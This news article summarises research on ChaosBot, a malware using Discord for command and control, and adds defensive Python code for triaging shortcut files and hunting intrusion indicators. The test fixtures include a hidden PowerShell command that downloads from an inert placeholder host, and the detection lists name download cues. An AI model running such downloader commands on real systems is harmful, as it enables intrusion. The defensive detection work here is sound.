Discord Platform Exploited by New Data-Stealing Malware


Security researchers at eSentire have identified a new strain of malware—dubbed ChaosBot—that combines several modern tactics to establish persistent remote access on victims’ machines.

The campaign, first spotted in late September and aimed at financial-sector targets in Vietnam, uses a Rust-built payload and Discord as a command-and-control channel. Attackers leveraged stolen credentials (including a Cisco VPN account and an Active Directory privileged account) to deploy and spread the malware within victim environments.

Below is a clear, non-technical summary of what ChaosBot does, how it infects systems, and what organisations and users can do to detect and mitigate it.

How ChaosBot Infects Systems

  • Phishing lures: Attackers send messages that encourage users to open malicious files. The campaign uses common social-engineering tricks—e.g., a PDF that looks like official correspondence from a bank—to distract victims while the payload installs.
  • LNK shortcut + PowerShell: The initial delivery relies on malicious Windows shortcut files (LNK) that execute a PowerShell command to download and launch the malware.
  • Legitimate tool abuse: The malware drops a malicious DLL that is executed via a browser binary (Microsoft Edge in this campaign), helping it blend into normal process activity.
  • Credential misuse: Compromised VPN credentials and privileged AD accounts were used to move laterally and to seed the malware into corporate networks.
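The LNK-plus-PowerShell delivery described above is something a defender can triage statically before a shortcut is ever opened. The following is an added example (not eSentire's tooling and not code from the report) that parses the Windows ShellLink header and string data per the public MS-SHLLINK layout and flags shortcuts whose target or arguments carry PowerShell download cues. The sample shortcuts, the token list and the ANSI code page assumption are constructed for the example.

```python
"""Static triage of Windows shortcut (.lnk) files.

Parses the ShellLinkHeader and StringData sections (MS-SHLLINK 2.1, 2.4) and
reports shortcuts whose target/arguments look like a PowerShell downloader.
Added example; not eSentire's tooling.
"""
import struct
import uuid

LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# Constructed cue list for triage; order determines the order of reported hits.
SUSPICIOUS_TOKENS = ("powershell", "pwsh", "-enc", "hidden", "bypass",
                     "downloadstring", "downloadfile", "iwr", "invoke-webrequest",
                     "iex", "invoke-expression", "http://", "https://")


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a .lnk file; raise ValueError if malformed."""
    if len(data) < 0x4C:
        raise ValueError("too short for a ShellLinkHeader")
    header_size, = struct.unpack_from("<I", data, 0)
    clsid = uuid.UUID(bytes_le=data[4:20])
    if header_size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a ShellLink file")
    flags, = struct.unpack_from("<I", data, 0x14)
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:        # 2-byte IDListSize, then the IDList
        idlist_size, = struct.unpack_from("<H", data, pos)
        pos += 2 + idlist_size
    if flags & HAS_LINK_INFO:                  # LinkInfoSize includes itself
        link_info_size, = struct.unpack_from("<I", data, pos)
        pos += link_info_size
    unicode = bool(flags & IS_UNICODE)

    def read_string() -> str:
        nonlocal pos
        count, = struct.unpack_from("<H", data, pos)   # CountCharacters
        pos += 2
        width = 2 if unicode else 1
        raw = data[pos:pos + count * width]
        pos += count * width
        # ANSI strings use the system code page; cp1252 is an assumption here.
        return raw.decode("utf-16-le" if unicode else "cp1252", errors="replace")

    fields = {}
    for flag, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                       (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                       (HAS_ICON_LOCATION, "icon_location")):
        if flags & flag:
            fields[name] = read_string()
    return fields


def triage_lnk(data: bytes) -> list:
    """Return the suspicious tokens present in the shortcut's path/arguments."""
    fields = parse_lnk(data)
    haystack = " ".join(fields.get(k, "") for k in
                        ("relative_path", "arguments", "working_dir")).lower()
    return [t for t in SUSPICIOUS_TOKENS if t in haystack]


def build_sample_lnk(relative_path: str, arguments: str) -> bytes:
    """Constructed test fixture: a minimal Unicode .lnk carrying only string data."""
    header = bytearray(0x4C)
    struct.pack_into("<I", header, 0, 0x4C)
    header[4:20] = LNK_CLSID.bytes_le
    struct.pack_into("<I", header, 0x14, HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE)

    def enc(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return bytes(header) + enc(relative_path) + enc(arguments)


# Constructed samples: a downloader-style shortcut (inert .invalid host) and a benign one.
SUSPICIOUS_SAMPLE = build_sample_lnk(
    r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    '-w hidden -nop -c "iwr http://example.invalid/update"')
BENIGN_SAMPLE = build_sample_lnk(r"..\..\Windows\System32\notepad.exe", "report.txt")

if __name__ == "__main__":
    for label, sample in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, parse_lnk(sample), triage_lnk(sample))
```

The parser walks the optional LinkTargetIDList and LinkInfo blocks by their declared sizes, so it can extract arguments from real shortcuts, not only the fixture; an email gateway or file-share scan can apply `triage_lnk` to quarantine hits for analyst review.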

Key Capabilities

ChaosBot is multi-faceted and modular. Its observed capabilities include:

  • Discord-based C2: The operator uses a Discord server/channel to receive beacons (hostnames) and issue commands. This helps the operator blend C2 traffic with normal web activity.
  • Remote command execution: The malware can run shell commands on the infected host.
  • Data exfiltration: It can upload files and screenshots back to the attacker-controlled Discord channel.
  • Downloader functionality: ChaosBot can fetch and deploy additional payloads or tooling.
  • Alternate backdoors: Operators attempted to leverage tools like VS Code Tunnel as a secondary access method (researchers reported these attempts largely failed).
  • Ransom/harassment capabilities: A separate C++ variant was observed that can encrypt small files, target cryptocurrency data, and delete very large files to coerce victims into paying.

Why Discord?

Using mainstream platforms such as Discord for command-and-control gives attackers several conveniences:

  • Traffic can look similar to benign user activity.
  • Built-in messaging and file upload features make it easy to receive beacons and push new payloads.
  • Accounts and channels can be rapidly created and discarded.

Signs of Compromise (High-Level Indicators)

Watch for unusual behaviours such as:

  • LNK files arriving in email or file shares that trigger unexpected PowerShell activity.
  • Browser processes (Microsoft Edge in this campaign) loading unusual DLLs or spawning unexpected child processes.
  • Outbound traffic to Discord endpoints from servers or systems that shouldn’t be using Discord.
  • Unexpected file uploads to external services from workstations.
  • Unusual use of privileged accounts, anomalous VPN logins, or sudden AD modifications.

(Do not rely on these alone—investigate anomalous events contextually.)
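The indicators above, and the log correlation recommended under incident response and threat hunting below, translate into a small set of behavioural rules. The following is an added example (not eSentire's detection content) that runs such rules over constructed endpoint, network and VPN events. The event field names, the privileged-account list, the expected VPN country and the trusted DLL directories are assumptions chosen for the example; the Discord hostnames are the platform's public domains, not indicators from the report.

```python
"""Behavioural hunt over constructed telemetry for ChaosBot-style indicators.

Event shapes are assumed for the example (not a vendor schema). Added example,
not eSentire's detection content.
"""
from dataclasses import dataclass

DISCORD_DOMAINS = ("discord.com", "discordapp.com", "discord.gg")   # public platform domains
PS_CUES = ("iwr", "invoke-webrequest", "downloadstring", "downloadfile", "iex",
           "-enc", "hidden", "bypass", "http://", "https://")
BROWSERS = ("msedge.exe", "chrome.exe", "firefox.exe")
TRUSTED_DLL_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
PRIVILEGED_ACCOUNTS = {"da_admin", "svc_backup"}   # constructed
EXPECTED_VPN_COUNTRIES = {"VN"}                    # constructed
BUSINESS_HOURS = range(7, 20)                      # 07:00-19:59, constructed


@dataclass
class Finding:
    rule: str
    host: str
    detail: str


def hunt(events: list) -> list:
    """Apply the indicator rules to a list of event dicts; return findings in event order."""
    findings = []
    for e in events:
        kind = e["type"]
        if kind == "process_create":
            image = e["image"].lower()
            parent = e["parent_image"].lower()
            cmd = e["cmdline"].lower()
            # Unexpected PowerShell download activity (LNK-style delivery)
            if image.endswith(("powershell.exe", "pwsh.exe")) and any(c in cmd for c in PS_CUES):
                findings.append(Finding("ps_downloader", e["host"], e["cmdline"]))
            # Browser spawning a shell is not normal user behaviour
            if parent.endswith(BROWSERS) and image.endswith(("cmd.exe", "powershell.exe", "pwsh.exe")):
                findings.append(Finding("browser_child", e["host"], f"{parent} -> {image}"))
        elif kind == "image_load":
            proc = e["process_image"].lower()
            dll = e["dll_path"].lower()
            # Browser loading a DLL from outside trusted install locations
            if proc.endswith(BROWSERS) and not dll.startswith(TRUSTED_DLL_DIRS):
                findings.append(Finding("browser_dll", e["host"], e["dll_path"]))
        elif kind == "network_connect":
            dest = e["dest_host"].lower()
            # Discord traffic from systems (servers) that have no business using it
            if dest.endswith(DISCORD_DOMAINS) and e["role"] == "server":
                findings.append(Finding("discord_from_server", e["host"], e["dest_host"]))
        elif kind == "vpn_login":
            # Privileged account logging in from an unexpected country or outside hours
            if e["user"] in PRIVILEGED_ACCOUNTS and (
                    e["country"] not in EXPECTED_VPN_COUNTRIES or e["hour"] not in BUSINESS_HOURS):
                findings.append(Finding("vpn_anomaly", e["host"],
                                        f"{e['user']} from {e['country']} at {e['hour']:02d}:00"))
    return findings


# Constructed sample telemetry (hostnames, users and paths are invented)
SAMPLE_EVENTS = [
    {"type": "process_create", "host": "WS01", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": '-w hidden -c "iwr http://example.invalid/update"'},
    {"type": "image_load", "host": "WS01", "process_image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "dll_path": r"C:\Users\alice\AppData\Local\Temp\helper.dll"},
    {"type": "image_load", "host": "WS02", "process_image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "dll_path": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.dll"},
    {"type": "network_connect", "host": "SRV-DB01", "role": "server", "dest_host": "gateway.discord.gg"},
    {"type": "network_connect", "host": "WS03", "role": "workstation", "dest_host": "discord.com"},
    {"type": "vpn_login", "host": "VPN-GW", "user": "da_admin", "country": "US", "hour": 3},
    {"type": "vpn_login", "host": "VPN-GW", "user": "alice", "country": "VN", "hour": 10},
    {"type": "process_create", "host": "WS01", "parent_image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd /c whoami"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f.rule:20} {f.host:10} {f.detail}")
```

Each rule is deliberately narrow (a server talking to Discord, a browser loading a DLL from a user-writable path) so that a hit is worth an analyst's time; as the note above says, a single hit is a lead to investigate in context, not proof of compromise.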

Recommended Defensive Actions (for Organizations)

  1. Harden credentials and access:
    • Enforce strong, unique passwords plus multi-factor authentication for VPNs, remote access tools, and privileged AD accounts.
    • Rotate and revoke exposed credentials immediately.
  2. Restrict and monitor remote access:
    • Limit VPN access and administrative logins to the minimum necessary.
    • Apply conditional access rules and geofencing where appropriate.
    • Closely audit VPN and RDP sessions for odd timeframes or locations.
  3. Email and endpoint protection:
    • Tighten email filtering to block malicious attachments (especially LNKs) and phishing messages.
    • Configure endpoint detection and response (EDR) to catch script-based downloaders and unusual DLL injection behaviors.
  4. Network controls:
    • Monitor and, where reasonable, restrict traffic to consumer collaboration platforms (including Discord) from corporate networks or endpoints that should not use them.
    • Use proxy/next-gen firewall capabilities to detect uncommon uploads, tunnels, and outbound connections.
  5. Application allowlisting and process monitoring:
    • Use allowlisting to prevent unauthorised binaries from executing.
    • Monitor browsers and helper binaries for suspicious child processes or DLL loads.
  6. Backup and recovery readiness:
    • Maintain immutable backups and test restoration procedures regularly to recover from destructive or ransomware-like activity.
  7. Incident response and threat hunting:
    • Hunt for IOCs and behaviour patterns described above, and correlate logs from VPN, AD, EDR, and network devices.
    • If compromise is suspected, isolate affected hosts, collect forensic artifacts, and engage your IR team.
  8. User education:
    • Remind staff about the dangers of opening unexpected attachments or links, and train them to verify requests that involve credentials or file execution.

For Individuals

  • Be cautious with unexpected attachments—avoid opening LNK files or running downloaded scripts.
  • Keep operating systems, browsers, and antivirus/endpoint tools up to date.
  • Use MFA on all important accounts (VPN, email, cloud storage).
  • Report suspicious emails to your security team.

ChaosBot shows how threat actors combine social engineering, legitimate tooling, and mainstream platforms to complicate detection. Its use of Discord for C2 underscores the need to look beyond signature-based defences and to place emphasis on behavioural detection, credential hygiene, and network segmentation.

If you suspect an incident involving this or similar malware, treat it as urgent: contain affected systems, preserve logs and disk images for investigation, and notify relevant incident response resources.

Source: eSentire

Ashwin is a seasoned financial journalist and content strategist with over 4 years of experience covering global markets, economic policy, and personal finance. He holds a Bachelor's degree in Economics from Northwestern University and earned a Chartered Financial Analyst designation in 2019.